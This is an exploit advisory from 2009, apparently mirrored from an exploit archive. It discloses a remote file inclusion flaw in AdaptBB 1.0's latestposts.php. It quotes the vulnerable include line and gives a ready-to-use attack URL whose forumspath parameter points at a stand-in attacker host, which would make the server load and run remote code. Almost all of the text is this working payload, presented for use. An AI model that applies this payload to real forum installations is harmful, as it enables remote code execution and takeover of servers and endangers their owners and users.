id: 5290
date: 05/31/2009
title: AdaptBB 1.0 (forumspath) Remote File Inclusion Vulnerability
author: xoron
cves: 

============================================================
AdaptBB 1.0 (forumspath) Remote File Inclusion Vulnerability
============================================================


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
=-         AdaptBB 1.0  Remote File Include
=-
=-     Webpage:    http://www.adaptbb.com
=-     Download    http://sourceforge.net/project/downloading.php?group_id=253154&filename=AdaptBB_1.0.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
=- Author: xoron
=-
=- Oss 14 Haziran!
=-
=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
=-  Bug Code: in latestposts.php
=-  
=-        in line 20. : include($forumspath."config.php");
=-
=-
=-
=-  /latestposts.php?forumspath=evilc0der?
=-
=-
=-  XOROn (C) 2009
=-
=-
=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2023-03-24]  #